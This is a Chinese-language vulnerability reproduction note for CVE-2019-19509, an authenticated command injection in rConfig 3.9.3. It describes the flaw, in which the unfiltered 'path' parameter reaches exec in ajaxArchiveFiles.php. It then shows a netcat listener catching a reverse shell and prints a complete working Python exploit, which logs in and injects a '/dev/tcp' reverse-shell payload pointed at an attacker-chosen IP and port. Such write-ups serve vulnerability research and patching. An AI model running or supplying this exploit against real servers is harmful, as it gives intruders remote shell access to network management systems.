（CVE-2019-19509）rConfig v3.9.3 后台远程命令执行漏洞

一、漏洞简介

rConfig是一款开源的网络配置管理实用程序。 rConfig 3.9.3版本中存在安全漏洞，该漏洞源于程序没有进行过滤就直接将'path'参数传输到'exec'函数。远程攻击者可通过向ajaxArchiveFiles.php文件发送GET请求利用该漏洞执行系统命令。

二、漏洞影响

rConfig v3.9.3

三、复现过程

python3 CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# ...
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
# bash: no job control in this shell
# bash-4.2$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
# bash-4.2$

CVE-2019-19509.py

#!/usr/bin/python3

# Exploit Title: rConfig <= v3.9.3 Authenticated Remote Code Execution
# Date: 07/11/2019
# CVE-2019-19509
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall

import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print ("rconfig - CVE-2019-19509 - Web authenticated RCE")

if len(sys.argv) != 6:
    print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)

request = requests.session()

login_info = {
    "user": username,
    "pass": password,
    "sublogin": 1
}

login_request = request.post(
    target+"/lib/crud/userprocess.php",
     login_info,
     verify=False,
     allow_redirects=True
 )

dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)

if dashboard_request.status_code == 200:
    print ("[+] Logged in successfully, triggering the payload...")
    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
    print ("[+] Check your listener !")
    exploit_req = request.get(encoded_request)

elif dashboard_request.status_code == 302:
    print ("[-] Wrong credentials !")
    exit()